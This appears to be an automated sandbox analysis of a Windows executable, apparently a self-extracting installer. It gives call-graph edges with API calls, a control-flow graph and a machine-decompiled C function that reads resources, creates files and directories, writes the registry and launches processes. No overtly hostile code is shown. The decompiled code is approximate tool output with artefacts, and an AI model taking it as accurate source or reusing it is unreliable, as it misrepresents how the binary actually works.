2888 a849ba 2884->2888 2886 a844b9 20 API calls 2885->2886 2886->2888 2887->2888 2893 a8487a 2887->2893 2888->2875 2890 a84b60 2888->2890 2891 a84b92 FindCloseChangeNotification 2890->2891 2892 a84b76 2890->2892 2891->2892 2892->2875 2894 a848a2 CreateFileA 2893->2894 2896 a84908 2894->2896 2897 a848e9 2894->2897 2896->2888 2897->2896 2898 a848ee 2897->2898 2901 a8490c 2898->2901 2902 a848f5 CreateFileA 2901->2902 2904 a84917 2901->2904 2902->2896 2903 a84962 CharNextA 2903->2904 2904->2902 2904->2903 2905 a84953 CreateDirectoryA 2904->2905 2905->2903 2907 a8255b 2906->2907 2908 a82510 2906->2908 2909 a86ce0 4 API calls 2907->2909 2910 a8658a CharPrevA 2908->2910 2911 a82569 2909->2911 2912 a82522 WritePrivateProfileStringA _lopen 2910->2912 2911->2664 2912->2907 2913 a82548 _llseek _lclose 2912->2913 2913->2907 2915 a81b25 2914->2915 3018 a81a84 2915->3018 2917 a81b57 2918 a8658a CharPrevA 2917->2918 2920 a81b8c 2917->2920 2918->2920 2919 a866c8 2 API calls 2921 a81bd1 2919->2921 2920->2919 2922 a81bd9 CompareStringA 2921->2922 2923 a81d73 2921->2923 2922->2923 2924 a81bf7 GetFileAttributesA 2922->2924 2925 a866c8 2 API calls 2923->2925 2926 a81c0d 2924->2926 2927 a81d53 2924->2927 2928 a81d7d 2925->2928 2926->2927 2933 a81a84 2 API calls 2926->2933 2931 a844b9 20 API calls 2927->2931 2929 a81df8 LocalAlloc 2928->2929 2930 a81d81 CompareStringA 2928->2930 2929->2927 2932 a81e0b GetFileAttributesA 2929->2932 2930->2929 2939 a81d9b 2930->2939 2951 a81cc2 2931->2951 2934 a81e45 2932->2934 2942 a81e1d 2932->2942 2935 a81c31 2933->2935 3024 a82aac 2934->3024 2937 a81c50 LocalAlloc 2935->2937 2943 a81a84 2 API calls 2935->2943 2936 a81e89 2938 a86ce0 4 API calls 2936->2938 2937->2927 2940 a81c67 GetPrivateProfileIntA GetPrivateProfileStringA 2937->2940 2941 a81ea1 2938->2941 2939->2939 2944 a81dbe LocalAlloc 2939->2944 2947 a81cf8 2940->2947 2940->2951 2941->2677 2942->2934 2943->2937 2944->2927 2948 a81de1 2944->2948 2949 a81d09 GetShortPathNameA 2947->2949 2952 a81d23 2947->2952 2950 a8171e _vsnprintf 2948->2950 2949->2952 2950->2951 2951->2936 2953 a8171e _vsnprintf 2952->2953 2953->2951 2955 a8209a 2954->2955 2963 a82256 2954->2963 2957 a8171e _vsnprintf 2955->2957 2960 a820dc 2955->2960 2956 a86ce0 4 API calls 2958 a82263 2956->2958 2959 a820af RegQueryValueExA 2957->2959 2958->2677 2959->2955 2959->2960 2961 a820fb GetSystemDirectoryA 2960->2961 2962 a820e4 RegCloseKey 2960->2962 2964 a8658a CharPrevA 2961->2964 2962->2963 2963->2956 2965 a8211b LoadLibraryA 2964->2965 2966 a82179 GetModuleFileNameA 2965->2966 2967 a8212e GetProcAddress FreeLibrary 2965->2967 2969 a821de RegCloseKey 2966->2969 2972 a82177 2966->2972 2967->2966 2968 a8214e GetSystemDirectoryA 2967->2968 2970 a82165 2968->2970 2968->2972 2969->2963 2971 a8658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 a821b7 LocalAlloc 2972->2973 2974 a821ec 2973->2974 2975 a821cd 2973->2975 2977 a8171e _vsnprintf 2974->2977 2976 a844b9 20 API calls 2975->2976 2976->2969 2978 a82218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2963 2981 a84016 CreateProcessA 2980->2981 2992 a84106 2980->2992 2982 a84041 WaitForSingleObject GetExitCodeProcess 2981->2982 2983 a840c4 2981->2983 2986 a84070 2982->2986 2985 a86285 GetLastError 2983->2985 2984 a86ce0 4 API calls 2987 a84117 2984->2987 2988 a840c9 GetLastError FormatMessageA 2985->2988 3051 a8411b 2986->3051 2987->2677 2990 a844b9 20 API calls 2988->2990 2990->2992 2991 a84096 CloseHandle CloseHandle 2991->2992 2993 a840ba 2991->2993 2992->2984 2993->2992 2995 a864c2 2994->2995 2996 a8658a CharPrevA 2995->2996 2997 a864d8 GetFileAttributesA 2996->2997 2998 a864ea 2997->2998 2999 a86501 LoadLibraryA 2997->2999 2998->2999 3000 a864ee LoadLibraryExA 2998->3000 3001 a86508 2999->3001 3000->3001 3002 a86ce0 4 API calls 3001->3002 3003 a86513 3002->3003 3003->2702 3005 a82289 RegOpenKeyExA 3004->3005 3006 a82381 3004->3006 3005->3006 3008 a822b1 RegQueryValueExA 3005->3008 3007 a86ce0 4 API calls 3006->3007 3009 a8238c 3007->3009 3010 a82374 RegCloseKey 3008->3010 3011 a822e6 memset GetSystemDirectoryA 3008->3011 3009->2674 3010->3006 3012 a8230f 3011->3012 3013 a82321 3011->3013 3015 a8658a CharPrevA 3012->3015 3014 a8171e _vsnprintf 3013->3014 3016 a8233f RegSetValueExA 3014->3016 3015->3013 3016->3010 3019 a81a9a 3018->3019 3021 a81aba 3019->3021 3023 a81aaf 3019->3023 3037 a8667f 3019->3037 3021->2917 3022 a8667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 a82ad4 GetModuleFileNameA 3024->3025 3028 a82be6 3024->3028 3036 a82b02 3025->3036 3026 a86ce0 4 API calls 3029 a82bf5 3026->3029 3027 a82af1 IsDBCSLeadByte 3027->3036 3028->3026 3029->2936 3030 a82bca CharNextA 3033 a82bd3 CharNextA 3030->3033 3031 a82b11 CharNextA CharUpperA 3032 a82b8d CharUpperA 3031->3032 3031->3036 3032->3036 3033->3036 3035 a82b43 CharPrevA 3035->3036 3036->3027 3036->3028 3036->3030 3036->3031 3036->3033 3036->3035 3042 a865e8 3036->3042 3040 a86689 3037->3040 3038 a866a5 3038->3019 3039 a86648 IsDBCSLeadByte 3039->3040 3040->3038 3040->3039 3041 a86697 CharNextA 3040->3041 3041->3040 3043 a865f4 3042->3043 3043->3043 3044 a865fb CharPrevA 3043->3044 3045 a86611 CharPrevA 3044->3045 3046 a8660b 3045->3046 3047 a8661e 3045->3047 3046->3045 3046->3047 3048 a8663d 3047->3048 3049 a86634 CharNextA 3047->3049 3050 a86627 CharPrevA 3047->3050 3048->3036 3049->3048 3050->3048 3050->3049 3052 a84132 3051->3052 3054 a8412a 3051->3054 3055 a81ea7 3052->3055 3054->2991 3056 a81ed3 3055->3056 3057 a81eba 3055->3057 3056->3054 3058 a8256d 15 API calls 3057->3058 3058->3056 3060 a81ff0 RegOpenKeyExA 3059->3060 3061 a82026 3059->3061 3060->3061 3062 a8200f RegDeleteValueA RegCloseKey 3060->3062 3061->2321 3062->3061 3129 a819e0 3130 a81a03 3129->3130 3131 a81a24 GetDesktopWindow 3129->3131 3132 a81a20 3130->3132 3134 a81a16 EndDialog 3130->3134 3138 a843d0 6 API calls 3131->3138 3136 a86ce0 4 API calls 3132->3136 3134->3132 3137 a81a7e 3136->3137 3139 a84463 SetWindowPos 3138->3139 3141 a86ce0 4 API calls 3139->3141 3142 a81a33 LoadStringA SetDlgItemTextA MessageBeep 3141->3142 3142->3132 3143 a86a20 __getmainargs 3144 a869b0 3145 a869b5 3144->3145 3153 a86fbe GetModuleHandleW 3145->3153 3147 a869c1 __set_app_type __p__fmode __p__commode 3148 a869f9 3147->3148 3149 a86a0e 3148->3149 3150 a86a02 __setusermatherr 3148->3150 3155 a871ef _controlfp 3149->3155 3150->3149 3152 a86a13 3154 a86fcf 3153->3154 3154->3147 3155->3152 3156 a834f0 3157 a83504 3156->3157 3158 a835b8 3156->3158 3157->3158 3159 a8351b 3157->3159 3160 a835be GetDesktopWindow 3157->3160 3161 a83671 EndDialog 3158->3161 3162 a83526 3158->3162 3164 a8354f 3159->3164 3165 a8351f 3159->3165 3163 a843d0 11 API calls 3160->3163 3161->3162 3166 a835d6 3163->3166 3164->3162 3168 a83559 ResetEvent 3164->3168 3165->3162 3167 a8352d TerminateThread EndDialog 3165->3167 3170 a8361d SetWindowTextA CreateThread 3166->3170 3171 a835e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3166->3171 3167->3162 3169 a844b9 20 API calls 3168->3169 3172 a83581 3169->3172 3170->3162 3173 a83646 3170->3173 3171->3170 3174 a8359b SetEvent 3172->3174 3176 a8358a SetEvent 3172->3176 3175 a844b9 20 API calls 3173->3175 3177 a83680 4 API calls 3174->3177 3175->3158 3176->3162 3177->3158 3178 a86ef0 3179 a86f2d 3178->3179 3181 a86f02 3178->3181 3180 a86f27 ?terminate@ 3180->3179 3181->3179 3181->3180 3182 a87270 _except_handler4_common 3063 a84cc0 GlobalFree 3064 a86f40 SetUnhandledExceptionFilter 3183 a84bc0 3185 a84bd7 3183->3185 3186 a84c05 3183->3186 3184 a84c1b SetFilePointer 3184->3185 3186->3184 3186->3185 3187 a830c0 3188 a830de CallWindowProcA 3187->3188 3189 a830ce 3187->3189 3190 a830da 3188->3190 3189->3188 3189->3190 3191 a863c0 3192 a86407 3191->3192 3193 a8658a CharPrevA 3192->3193 3194 a86415 CreateFileA 3193->3194 3195 a86448 WriteFile 3194->3195 3196 a8643a 3194->3196 3197 a86465 CloseHandle 3195->3197 3199 a86ce0 4 API calls 3196->3199 3197->3196 3200 a8648f 3199->3200 3201 a83100 3202 a831b0 3201->3202 3203 a83111 3201->3203 3204 a831b9 SendDlgItemMessageA 3202->3204 3207 a83141 3202->3207 3205 a83149 GetDesktopWindow 3203->3205 3209 a8311d 3203->3209 3204->3207 3208 a843d0 11 API calls 3205->3208 3206 a83138 EndDialog 3206->3207 3210 a8315d 6 API calls 3208->3210 3209->3206 3209->3207 3210->3207 3211 a84200 3212 a8420b SendMessageA 3211->3212 3213 a8421e 3211->3213 3212->3213 3214 a86c03 3215 a86c1e 3214->3215 3216 a86c17 _exit 3214->3216 3217 a86c32 3215->3217 3218 a86c27 _cexit 3215->3218 3216->3215 3218->3217 3065 a84cd0 3066 a84d0b 3065->3066 3067 a84cf4 3065->3067 3068 a84d02 3066->3068 3071 a84dcb 3066->3071 3074 a84d25 3066->3074 3067->3068 3069 a84b60 FindCloseChangeNotification 3067->3069 3070 a86ce0 4 API calls 3068->3070 3069->3068 3073 a84e95 3070->3073 3072 a84dd4 SetDlgItemTextA 3071->3072 3075 a84de3 3071->3075 3072->3075 3074->3068 3088 a84c37 3074->3088 3075->3068 3093 a8476d 3075->3093 3078 a84e38 3078->3068 3080 a84980 25 API calls 3078->3080 3082 a84e56 3080->3082 3081 a84b60 FindCloseChangeNotification 3083 a84d99 SetFileAttributesA 3081->3083 3082->3068 3084 a84e64 3082->3084 3083->3068 3102 a847e0 LocalAlloc 3084->3102 3087 a84e6f 3087->3068 3089 a84c4c DosDateTimeToFileTime 3088->3089 3092 a84c88 3088->3092 3090 a84c5e LocalFileTimeToFileTime 3089->3090 3089->3092 3091 a84c70 SetFileTime 3090->3091 3090->3092 3091->3092 3092->3068 3092->3081 3111 a866ae GetFileAttributesA 3093->3111 3095 a8477b 3095->3078 3096 a847cc SetFileAttributesA 3097 a847db 3096->3097 3097->3078 3099 a86517 24 API calls 3100 a847b1 3099->3100 3100->3096 3100->3097 3101 a847c2 3100->3101 3101->3096 3103 a8480f LocalAlloc 3102->3103 3104 a847f6 3102->3104 3106 a8480b 3103->3106 3108 a84831 3103->3108 3105 a844b9 20 API calls 3104->3105 3105->3106 3106->3087 3109 a844b9 20 API calls 3108->3109 3110 a84846 LocalFree 3109->3110 3110->3106 3112 a84777 3111->3112 3112->3095 3112->3096 3112->3099 3113 a84ad0 3121 a83680 3113->3121 3116 a84ae9 3117 a84aee WriteFile 3118 a84b0f 3117->3118 3119 a84b14 3117->3119 3119->3118 3120 a84b3b SendDlgItemMessageA 3119->3120 3120->3118 3122 a83691 MsgWaitForMultipleObjects 3121->3122 3123 a836e8 3122->3123 3124 a836a9 PeekMessageA 3122->3124 3123->3116 3123->3117 3124->3122 3127 a836bc 3124->3127 3125 a836c7 DispatchMessageA 3126 a836d1 PeekMessageA 3125->3126 3126->3127 3127->3122 3127->3123 3127->3125 3127->3126 3219 a83210 3220 a8328e EndDialog 3219->3220 3221 a83227 3219->3221 3236 a83239 3220->3236 3222 a833e2 GetDesktopWindow 3221->3222 3223 a83235 3221->3223 3225 a843d0 11 API calls 3222->3225 3227 a8324c 3223->3227 3228 a832dd GetDlgItemTextA 3223->3228 3223->3236 3226 a833f1 SetWindowTextA SendDlgItemMessageA 3225->3226 3229 a8341f GetDlgItem EnableWindow 3226->3229 3226->3236 3230 a83251 3227->3230 3231 a832c5 EndDialog 3227->3231 3237 a832fc 3228->3237 3252 a83366 3228->3252 3229->3236 3232 a8325c LoadStringA 3230->3232 3230->3236 3231->3236 3234 a8327b 3232->3234 3235 a83294 3232->3235 3233 a844b9 20 API calls 3233->3236 3240 a844b9 20 API calls 3234->3240 3257 a84224 LoadLibraryA 3235->3257 3239 a83331 GetFileAttributesA 3237->3239 3237->3252 3243 a8337c 3239->3243 3244 a8333f 3239->3244 3240->3220 3242 a832a5 SetDlgItemTextA 3242->3234 3242->3236 3245 a8658a CharPrevA 3243->3245 3246 a844b9 20 API calls 3244->3246 3247 a8338d 3245->3247 3248 a83351 3246->3248 3249 a858c8 27 API calls 3247->3249 3248->3236 3250 a8335a CreateDirectoryA 3248->3250 3251 a83394 3249->3251 3250->3243 3250->3252 3251->3252 3253 a833a4 3251->3253 3252->3233 3254 a833c7 EndDialog 3253->3254 3255 a8597d 34 API calls 3253->3255 3254->3236 3256 a833c3 3255->3256 3256->3236 3256->3254 3258 a843b2 3257->3258 3259 a84246 GetProcAddress 3257->3259 3263 a844b9 20 API calls 3258->3263 3260 a8425d GetProcAddress 3259->3260 3261 a843a4 FreeLibrary 3259->3261 3260->3261 3262 a84274 GetProcAddress 3260->3262 3261->3258 3262->3261 3264 a8428b 3262->3264 3265 a8329d 3263->3265 3266 a84295 GetTempPathA 3264->3266 3270 a842e1 3264->3270 3265->3236 3265->3242 3267 a842ad 3266->3267 3267->3267 3268 a842b4 CharPrevA 3267->3268 3269 a842d0 CharPrevA 3268->3269 3268->3270 3269->3270 3271 a84390 FreeLibrary 3270->3271 3271->3265 3272 a84a50 3273 a84a9f ReadFile 3272->3273 3274 a84a66 3272->3274 3275 a84abb 3273->3275 3274->3275 3276 a84a82 memcpy 3274->3276 3276->3275 3277 a83450 3278 a8345e 3277->3278 3279 a834d3 EndDialog 3277->3279 3281 a8349a GetDesktopWindow 3278->3281 3285 a83465 3278->3285 3280 a8346a 3279->3280 3282 a843d0 11 API calls 3281->3282 3283 a834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3282->3283 3283->3280 3284 a8348c EndDialog 3284->3280 3285->3280 3285->3284

                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                                              callgraph 0 Function_00A82CAA 9 Function_00A818A3 0->9 12 Function_00A844B9 0->12 20 Function_00A8468F 0->20 30 Function_00A85C9E 0->30 31 Function_00A82390 0->31 39 Function_00A836EE 0->39 46 Function_00A86CE0 0->46 95 Function_00A86517 0->95 1 Function_00A82AAC 24 Function_00A81680 1->24 37 Function_00A865E8 1->37 1->46 61 Function_00A817C8 1->61 2 Function_00A866AE 3 Function_00A855A0 3->12 18 Function_00A8658A 3->18 3->20 25 Function_00A81781 3->25 27 Function_00A86285 3->27 3->46 78 Function_00A82630 3->78 3->95 104 Function_00A85467 3->104 107 Function_00A8597D 3->107 117 Function_00A86952 3->117 4 Function_00A84CA0 5 Function_00A853A1 5->18 5->24 5->46 90 Function_00A8171E 5->90 6 Function_00A86FA1 7 Function_00A83BA2 7->12 7->20 7->25 7->27 34 Function_00A86495 7->34 35 Function_00A81AE8 7->35 41 Function_00A83FEF 7->41 7->46 70 Function_00A8202A 7->70 105 Function_00A82267 7->105 8 Function_00A872A2 40 Function_00A817EE 9->40 9->46 10 Function_00A86FA5 113 Function_00A8724D 10->113 11 Function_00A81EA7 97 Function_00A8256D 11->97 12->24 12->46 62 Function_00A867C9 12->62 12->90 91 Function_00A8681F 12->91 13 Function_00A86FBE 118 Function_00A86F54 13->118 14 Function_00A869B0 14->13 42 Function_00A871EF 14->42 84 Function_00A87000 14->84 110 Function_00A86C70 14->110 15 Function_00A816B3 15->25 16 Function_00A852B6 16->25 16->31 16->37 16->46 50 Function_00A81FE1 16->50 17 Function_00A82A89 18->15 19 Function_00A8268B 19->12 19->46 19->90 21 Function_00A86380 22 Function_00A83680 23 Function_00A84980 23->12 106 Function_00A8487A 23->106 24->25 26 Function_00A81A84 108 Function_00A8667F 26->108 28 Function_00A86298 28->46 28->90 29 Function_00A84E99 29->24 30->12 30->18 30->24 45 Function_00A831E0 30->45 30->46 60 Function_00A866C8 30->60 71 Function_00A86E2A 30->71 94 Function_00A85C17 30->94 30->108 31->15 31->18 31->24 31->31 31->46 32 Function_00A81F90 32->11 32->12 32->46 33 Function_00A86793 34->18 34->25 34->46 35->1 35->12 35->15 35->18 35->24 35->25 35->26 35->46 35->60 35->90 36 Function_00A828E8 36->17 111 Function_00A82773 36->111 38 Function_00A870EB 39->12 39->17 39->36 39->46 39->62 39->91 40->46 41->12 41->27 41->46 87 Function_00A8411B 41->87 43 Function_00A86BEF 44 Function_00A84FE0 44->12 44->20 54 Function_00A84EFD 44->54 56 Function_00A86CF0 46->56 47 Function_00A824E0 47->18 47->46 48 Function_00A819E0 48->46 69 Function_00A843D0 48->69 49 Function_00A847E0 49->12 49->24 51 Function_00A851E5 51->12 51->20 51->27 52 Function_00A866F9 53 Function_00A82BFB 53->0 53->16 53->32 88 Function_00A82F1D 53->88 54->23 54->46 99 Function_00A84B60 54->99 55 Function_00A870FE 57 Function_00A834F0 57->12 57->22 57->69 58 Function_00A86EF0 59 Function_00A858C8 59->12 59->18 59->24 59->27 112 Function_00A86648 60->112 62->33 63 Function_00A84CC0 64 Function_00A84BC0 65 Function_00A830C0 66 Function_00A863C0 66->18 66->25 66->46 67 Function_00A84AD0 67->22 68 Function_00A84CD0 68->23 68->29 68->46 68->49 79 Function_00A84C37 68->79 85 Function_00A84702 68->85 98 Function_00A8476D 68->98 68->99 69->46 70->12 70->18 70->46 70->90 71->56 72 Function_00A87120 73 Function_00A86A20 74 Function_00A84224 74->12 74->24 75 Function_00A83B26 75->28 75->44 75->95 76 Function_00A83A3F 76->12 76->20 76->27 76->95 77 Function_00A86C3F 78->12 78->46 80 Function_00A87208 81 Function_00A8490C 82 Function_00A83100 82->69 83 Function_00A84200 85->15 85->24 86 Function_00A86C03 86->113 87->11 88->3 88->7 88->12 88->18 88->27 88->46 88->51 88->75 88->76 89 Function_00A8621E 88->89 96 Function_00A84169 88->96 88->97 103 Function_00A85164 88->103 89->12 89->27 89->46 89->107 91->46 91->52 92 Function_00A87010 93 Function_00A83210 93->12 93->18 93->59 93->69 93->74 93->107 95->12 96->12 96->20 97->47 98->2 98->95 100 Function_00A86A60 100->53 100->77 100->80 101 Function_00A87060 100->101 100->113 119 Function_00A87155 100->119 101->72 101->92 102 Function_00A86760 103->12 103->20 103->28 104->5 104->18 104->24 104->25 104->27 104->46 104->59 104->107 105->18 105->46 105->90 106->81 107->12 107->19 107->27 107->46 108->112 109 Function_00A87270 111->18 111->24 111->25 111->46 114 Function_00A86F40 115 Function_00A84A50 116 Function_00A83450 116->69 118->80 118->113

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 36 a83ba2-a83bd9 37 a83bdb-a83bee call a8468f 36->37 38 a83bfd-a83bff 36->38 44 a83d13-a83d30 call a844b9 37->44 45 a83bf4-a83bf7 37->45 40 a83c03-a83c28 memset 38->40 42 a83c2e-a83c40 call a8468f 40->42 43 a83d35-a83d48 call a81781 40->43 42->44 54 a83c46-a83c49 42->54 49 a83d4d-a83d52 43->49 55 a83f4d 44->55 45->38 45->44 52 a83d9e-a83db6 call a81ae8 49->52 53 a83d54-a83d6c call a8468f 49->53 52->55 66 a83dbc-a83dc2 52->66 53->44 68 a83d6e-a83d75 53->68 54->44 57 a83c4f-a83c56 54->57 60 a83f4f-a83f63 call a86ce0 55->60 62 a83c58-a83c5e 57->62 63 a83c60-a83c65 57->63 69 a83c6e-a83c73 62->69 64 a83c75-a83c7c 63->64 65 a83c67-a83c6d 63->65 72 a83c87-a83c89 64->72 73 a83c7e-a83c82 64->73 65->69 70 a83dc4-a83dce 66->70 71 a83de6-a83de8 66->71 75 a83fda-a83fe1 68->75 76 a83d7b-a83d98 CompareStringA 68->76 69->72 70->71 77 a83dd0-a83dd7 70->77 79 a83f0b-a83f15 call a83fef 71->79 80 a83dee-a83df5 71->80 72->49 78 a83c8f-a83c98 72->78 73->72 81 a83fe8-a83fea 75->81 82 a83fe3 call a82267 75->82 76->52 76->75 77->71 84 a83dd9-a83ddb 77->84 85 a83c9a-a83c9c 78->85 86 a83cf1-a83cf3 78->86 91 a83f1a-a83f1c 79->91 87 a83fab-a83fd2 call a844b9 LocalFree 80->87 88 a83dfb-a83dfd 80->88 81->60 82->81 84->80 92 a83ddd-a83de1 call a8202a 84->92 94 a83c9e-a83ca3 85->94 95 a83ca5-a83ca7 85->95 86->52 90 a83cf9-a83d11 call a8468f 86->90 87->55 88->79 96 a83e03-a83e0a 88->96 90->44 90->49 98 a83f1e-a83f2d LocalFree 91->98 99 a83f46-a83f47 LocalFree 91->99 92->71 102 a83cb2-a83cc5 call a8468f 94->102 95->55 103 a83cad 95->103 96->79 104 a83e10-a83e19 call a86495 96->104 106 a83f33-a83f3b 98->106 107 a83fd7-a83fd9 98->107 99->55 102->44 112 a83cc7-a83ce8 CompareStringA 102->112 103->102 113 a83e1f-a83e36 GetProcAddress 104->113 114 a83f92-a83fa9 call a844b9 104->114 106->40 107->75 112->86 116 a83cea-a83ced 112->116 117 a83e3c-a83e80 113->117 118 a83f64-a83f76 call a844b9 FreeLibrary 113->118 125 a83f7c-a83f90 LocalFree call a86285 114->125 116->86 119 a83e8b-a83e94 117->119 120 a83e82-a83e87 117->120 118->125 123 a83e9f-a83ea2 119->123 124 a83e96-a83e9b 119->124 120->119 128 a83ead-a83eb6 123->128 129 a83ea4-a83ea9 123->129 124->123 125->55 131 a83eb8-a83ebd 128->131 132 a83ec1-a83ec3 128->132 129->128 131->132 133 a83ece-a83eec 132->133 134 a83ec5-a83eca 132->134 137 a83eee-a83ef3 133->137 138 a83ef5-a83efd 133->138 134->133 137->138 139 a83eff-a83f09 FreeLibrary 138->139 140 a83f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A83BA2() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				short _v300;
                                                                                                                                                                                                                                              				intOrPtr _v304;
                                                                                                                                                                                                                                              				void _v348;
                                                                                                                                                                                                                                              				char _v352;
                                                                                                                                                                                                                                              				intOrPtr _v356;
                                                                                                                                                                                                                                              				signed int _v360;
                                                                                                                                                                                                                                              				short _v364;
                                                                                                                                                                                                                                              				char* _v368;
                                                                                                                                                                                                                                              				intOrPtr _v372;
                                                                                                                                                                                                                                              				void* _v376;
                                                                                                                                                                                                                                              				intOrPtr _v380;
                                                                                                                                                                                                                                              				char _v384;
                                                                                                                                                                                                                                              				signed int _v388;
                                                                                                                                                                                                                                              				intOrPtr _v392;
                                                                                                                                                                                                                                              				signed int _v396;
                                                                                                                                                                                                                                              				signed int _v400;
                                                                                                                                                                                                                                              				signed int _v404;
                                                                                                                                                                                                                                              				void* _v408;
                                                                                                                                                                                                                                              				void* _v424;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                                                                              				signed int _t79;
                                                                                                                                                                                                                                              				short _t96;
                                                                                                                                                                                                                                              				signed int _t97;
                                                                                                                                                                                                                                              				intOrPtr _t98;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				signed int _t104;
                                                                                                                                                                                                                                              				signed int _t108;
                                                                                                                                                                                                                                              				int _t112;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				signed char _t118;
                                                                                                                                                                                                                                              				void* _t125;
                                                                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                                                                              				void* _t128;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                                                              				short _t137;
                                                                                                                                                                                                                                              				char* _t140;
                                                                                                                                                                                                                                              				signed char _t144;
                                                                                                                                                                                                                                              				signed char _t145;
                                                                                                                                                                                                                                              				signed int _t149;
                                                                                                                                                                                                                                              				void* _t150;
                                                                                                                                                                                                                                              				void* _t151;
                                                                                                                                                                                                                                              				signed int _t153;
                                                                                                                                                                                                                                              				void* _t155;
                                                                                                                                                                                                                                              				void* _t156;
                                                                                                                                                                                                                                              				signed int _t157;
                                                                                                                                                                                                                                              				signed int _t162;
                                                                                                                                                                                                                                              				signed int _t164;
                                                                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                              				_t69 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                              				_t153 = 0;
                                                                                                                                                                                                                                              				 *0xa89124 =  *0xa89124 & 0;
                                                                                                                                                                                                                                              				_t149 = 0;
                                                                                                                                                                                                                                              				_v388 = 0;
                                                                                                                                                                                                                                              				_v384 = 0;
                                                                                                                                                                                                                                              				_t165 =  *0xa88a28 - _t153; // 0x0
                                                                                                                                                                                                                                              				if(_t165 != 0) {
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t127 = 0;
                                                                                                                                                                                                                                              					_v392 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                              						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                              						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                              						_v348 = 0x44;
                                                                                                                                                                                                                                              						if( *0xa88c42 != 0) {
                                                                                                                                                                                                                                              							goto L26;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t146 =  &_v396;
                                                                                                                                                                                                                                              						_t115 = E00A8468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                              						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							_t146 = 0x4b1;
                                                                                                                                                                                                                                              							E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              							 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              							goto L62;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(_v396 != 1) {
                                                                                                                                                                                                                                              								__eflags = _v396 - 2;
                                                                                                                                                                                                                                              								if(_v396 != 2) {
                                                                                                                                                                                                                                              									_t137 = 3;
                                                                                                                                                                                                                                              									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                              									if(_v396 == _t137) {
                                                                                                                                                                                                                                              										_v304 = 1;
                                                                                                                                                                                                                                              										_v300 = _t137;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L14;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(6);
                                                                                                                                                                                                                                              								_v304 = 1;
                                                                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                                                                              								goto L11;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_v304 = 1;
                                                                                                                                                                                                                                              								L11:
                                                                                                                                                                                                                                              								_v300 = 0;
                                                                                                                                                                                                                                              								L14:
                                                                                                                                                                                                                                              								if(_t127 != 0) {
                                                                                                                                                                                                                                              									L27:
                                                                                                                                                                                                                                              									_t155 = 1;
                                                                                                                                                                                                                                              									__eflags = _t127 - 1;
                                                                                                                                                                                                                                              									if(_t127 != 1) {
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t132 =  &_v280;
                                                                                                                                                                                                                                              										_t76 = E00A81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                              										__eflags = _t76;
                                                                                                                                                                                                                                              										if(_t76 == 0) {
                                                                                                                                                                                                                                              											L62:
                                                                                                                                                                                                                                              											_t77 = 0;
                                                                                                                                                                                                                                              											L63:
                                                                                                                                                                                                                                              											_pop(_t150);
                                                                                                                                                                                                                                              											_pop(_t156);
                                                                                                                                                                                                                                              											_pop(_t128);
                                                                                                                                                                                                                                              											return E00A86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t157 = _v404;
                                                                                                                                                                                                                                              										__eflags = _t149;
                                                                                                                                                                                                                                              										if(_t149 != 0) {
                                                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												L57:
                                                                                                                                                                                                                                              												_t151 = _v408;
